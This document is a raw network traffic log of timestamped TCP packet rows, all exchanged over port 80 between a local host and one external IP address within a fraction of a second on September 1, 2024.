Sep 1, 2024 18:28:22.020050049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020054102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020064116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020072937 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020073891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020090103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020101070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020104885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020113945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020127058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020127058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020165920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020682096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020692110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020703077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020713091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020718098 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020723104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020729065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020730972 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020740032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020749092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020752907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020759106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020771027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020781994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020786047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020793915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020798922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020802975 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020814896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.020823002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020834923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.020864010 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.021603107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.021637917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.021744967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.021775007 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.021877050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.021918058 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022031069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022063971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022156954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022193909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022294998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022329092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022417068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022464991 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022552013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022587061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022680998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022696972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022706985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022716045 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022731066 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022746086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022809982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022845984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.022958040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.022996902 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024066925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024081945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024091959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024099112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024101973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024111986 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024111986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024127960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024146080 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024203062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024214029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024221897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024231911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024235010 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024240971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024252892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024264097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024266958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024269104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024271965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024281979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024287939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024292946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024301052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024310112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024326086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024334908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024342060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024343967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024353027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024362087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.024369001 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024384975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.024403095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105398893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105408907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105417967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105463982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105495930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105537891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105577946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105659008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105669022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105683088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105695009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105699062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105706930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105707884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105717897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105724096 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105731010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105732918 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105741024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105750084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105758905 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105761051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105770111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105779886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105782032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105808020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105817080 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.105959892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105968952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105978966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105992079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.105995893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106015921 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106038094 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106178999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106187105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106195927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106208086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106215000 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106218100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106220961 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106228113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106237888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106239080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106247902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106255054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106271982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106291056 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106815100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106823921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106832981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106842995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106851101 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106852055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106857061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106861115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106872082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106878996 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106880903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106895924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106903076 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106904984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106915951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106921911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106928110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106942892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106949091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106957912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.106964111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106980085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.106998920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107127905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107137918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107146025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107155085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107162952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107163906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107172966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107175112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107183933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107193947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107194901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107203007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107203960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107213020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107223988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107228994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107233047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107244015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107253075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107253075 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107261896 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107284069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107300997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107470989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107481003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107505083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107513905 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107615948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107625961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107640028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107649088 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107650042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107659101 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107666969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107669115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107677937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107683897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107688904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107697964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107707024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107708931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107718945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107723951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107728958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.107734919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107752085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.107772112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108186007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108198881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108208895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108217955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108222961 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108227968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108234882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108237982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108248949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108251095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108258963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108268976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108268976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108280897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108280897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108294010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108302116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108304024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108314037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108324051 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108324051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108333111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108356953 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108625889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108635902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108645916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108658075 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108683109 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108787060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108797073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108805895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108818054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108820915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108827114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108838081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108843088 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108853102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108863115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108866930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108872890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108877897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108882904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108894110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108896017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108903885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108916044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108922958 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108923912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.108933926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108949900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.108966112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.109474897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109509945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.109592915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109602928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109611988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109622002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109632015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109632015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.109642029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109642982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.109652996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109663963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109668970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.109673977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.109680891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.109704971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192429066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192454100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192465067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192504883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192519903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192595005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192604065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192611933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192624092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192631960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192635059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192650080 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192675114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192742109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192751884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192760944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192770958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192781925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192781925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192799091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192822933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192883968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.192922115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.192994118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193002939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193011999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193021059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193031073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193036079 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193039894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193051100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193057060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193061113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193074942 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193085909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193259954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193270922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193279982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193289042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193296909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193326950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193367958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193407059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193490028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193500042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193509102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193520069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193523884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193528891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193538904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193536997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193547964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193551064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193557978 CEST	80	56177	91.202.233.158	192.168.2.4
